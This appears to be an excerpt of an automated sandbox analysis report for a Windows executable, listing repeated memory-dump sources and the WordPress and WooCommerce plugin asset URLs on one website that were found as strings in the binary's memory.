                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
